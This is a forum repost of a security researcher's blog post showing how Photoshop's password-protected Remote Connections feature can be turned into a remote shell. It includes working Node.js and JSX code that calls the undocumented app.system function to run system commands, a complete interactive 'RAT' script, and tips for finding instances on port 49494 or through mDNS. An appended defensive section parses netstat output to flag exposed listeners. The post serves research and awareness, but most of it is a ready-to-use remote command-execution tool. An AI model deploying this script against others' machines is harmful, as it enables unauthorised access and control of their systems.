Nytro Posted July 30, 2017

codecolorist, Security research @ Chaitin Tech, Jul 30

How to turn Photoshop into a remote access tool

Photoshop has an optional feature named Remote Connections. It is disabled by default, but once you turn it on and set a password, anyone who knows the password can connect to your Photoshop instance remotely.

(screenshot: Enable remote connections)

A common use case for this feature is previewing documents in real time on remote devices, such as an iPad or a phone, to see how they actually look on different screens. You may need a third-party app such as Skala Preview or PS Play on the mobile device.

(screenshot: Skala Preview, image belongs to Bjango.com)

The remote connection actually runs JSX on the Photoshop instance. JSX here is Photoshop's macro (scripting) format, not the JSX from Facebook. The scripts are written in JavaScript and get their abilities from Photoshop: loading images, tuning colors, drawing vectors and then exporting. The following manuals show how to write and run the scripts, and which APIs are available.

Adobe provides an open-source library, generator-core, for establishing remote connections, so if you are curious about the details of the protocol you can take a look at it.

When you turn on Remote Connection, Photoshop listens on TCP port 49494:

```
$ netstat -an | grep 49494
tcp4 0 0 *.49494 *.* LISTEN
```

From the source we can see that the password is used to derive the key for the communication. The traffic is encrypted with Triple DES using a fixed IV, and the key is generated with PBKDF2 from the password, the constant salt "Adobe Photoshop" and 1000 iterations.
adobe-photoshop/generator-core: Core Node.js library for Adobe Photoshop CC's Generator extensibility layer (github.com)

The following snippet pops an alert on the remote Photoshop:

```javascript
const core = require("generator-core/lib/generator")
const options = { host: '192.168.1.123', password: 'password', port: 49494 }
const generator = core.createGenerator()
generator.start(options).done(() => {
  generator.evaluateJSXString('alert("Hello")').then(() => generator.shutdown())
})
```

What makes me excited is that there is a function that is not listed in the reference book: app.system, which executes an arbitrary system command. What about making it a web shell? Then I tried running this in my Photoshop, expecting it to pop the output:

```javascript
alert(app.system("id"))
```

Unfortunately, the return value is the exit status code, not the contents of stdout. A blind shell sucks. The solution is easy. Photoshop's JSX also provides an API for accessing the file system. We can redirect stdout to a temporary file, then read it:

```javascript
// Path of a scratch file in Photoshop's temp folder
var tmpFile = Folder.temp + '/output.txt';
app.system("id > " + tmpFile);
// Read the redirected output back through the ExtendScript File API
var stdout = new File(tmpFile);
stdout.open('r');
stdout.encoding = "UTF-8";
var content = stdout.read();
stdout.close();
stdout.remove();
alert(content);
```

That's it!
So my RAT script may look like this:

```javascript
const readline = require('readline')
const backdoor = require("generator-core/lib/generator")
const options = { host: '127.1', password: 'password', port: 49494 }

console.info('Establishing connection to ' + options.host)
const generator = backdoor.createGenerator()
generator.start(options).done(() => {
  const rl = readline.createInterface({ input: process.stdin, output: process.stdout, prompt: '> ' })
    .on('line', line => {
      let command = line.trim()
      // tmpFile is a JSX expression evaluated on the Photoshop side
      let tmpFile = `Folder.temp + ${JSON.stringify(Math.random() + '.txt')}`
      let reader = `var stdout = new File(${tmpFile});stdout.open('r');stdout.encoding = "UTF-8";var content = stdout.read();stdout.close();stdout.remove();content`
      generator.evaluateJSXString(`app.system("${command} > " + ${tmpFile});`).then(() => {
        generator.evaluateJSXString(reader).then(output => {
          console.log(output)
          rl.prompt()
        })
      })
    })
    .on('SIGINT', () => {
      generator.shutdown()
      rl.close()
    })
  console.log('Remote photoshop shell')
  rl.prompt()
})
```

(screenshot: result)

To discover nearby controllable Photoshop instances, simply scan TCP port 49494 or use the mDNS protocol to search for "_photoshopserver.tcp.".

This feature is not considered a vulnerability, since you need to know the password. I don't know if the algorithm is crackable. But if someone asks you to turn the feature on and hand over your password, be careful.

Source: https://medium.com/0xcc/how-to-turn-photoshop-into-a-remote-access-tool-972238dc98e9
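As an added example, not code from the original post or from generator-core, here is a Node.js check for the listener the post shows in its netstat output: it parses `netstat -an` lines, picks out a LISTEN socket on port 49494 and reports whether it is bound beyond loopback. It goes slightly beyond the post by also handling Linux-style address formatting; the sample netstat lines are constructed.

```javascript
// Added example, not code from the original post or from generator-core:
// flag a Photoshop Remote Connection listener (TCP 49494) in netstat
// output and report whether it is bound beyond loopback.
const PHOTOSHOP_PORT = 49494;

// Split a netstat local-address field into host and port. BSD/macOS
// netstat writes "*.49494" or "127.0.0.1.49494"; Linux writes
// "0.0.0.0:49494", ":::49494" or "127.0.0.1:49494".
function parseLocalAddress(field) {
  const sep = field.includes(':') ? ':' : '.';
  const idx = field.lastIndexOf(sep);
  if (idx < 0) return null;
  const port = Number(field.slice(idx + 1));
  if (!Number.isInteger(port)) return null;
  const host = field.slice(0, idx).replace(/^\[|\]$/g, '');
  return { host, port };
}

function isLoopback(host) {
  return host.startsWith('127.') || host === '::1' || host === 'localhost';
}

// One finding per LISTEN socket on the Photoshop port. A bind address that
// is not loopback ("*", "0.0.0.0", "::" or a LAN address) means other
// machines can reach the service with only the password in their way.
function findPhotoshopListeners(netstatOutput) {
  const findings = [];
  for (const line of netstatOutput.split('\n')) {
    // Columns: Proto Recv-Q Send-Q Local-Address Foreign-Address (state)
    const cols = line.trim().split(/\s+/);
    if (cols.length < 6 || !cols[0].startsWith('tcp') || cols[5] !== 'LISTEN') continue;
    const local = parseLocalAddress(cols[3]);
    if (!local || local.port !== PHOTOSHOP_PORT) continue;
    findings.push({ proto: cols[0], bind: local.host, exposed: !isLoopback(local.host) });
  }
  return findings;
}

// Constructed sample: the macOS line from the post plus a Linux-style line.
const SAMPLE_NETSTAT = [
  'Proto Recv-Q Send-Q  Local Address      Foreign Address    (state)',
  'tcp4       0      0  *.49494            *.*                LISTEN',
  'tcp4       0      0  127.0.0.1.631      *.*                LISTEN',
  'tcp6       0      0  :::49494           :::*               LISTEN',
  'tcp4       0      0  192.168.1.5.49494  192.168.1.9.52011  ESTABLISHED',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of findPhotoshopListeners(SAMPLE_NETSTAT)) {
    console.log(`${f.proto} bound to ${f.bind}: ${f.exposed ? 'reachable from the network' : 'loopback only'}`);
  }
}
```

To audit a real host, pass the output of `netstat -an` to `findPhotoshopListeners` instead of the constructed sample.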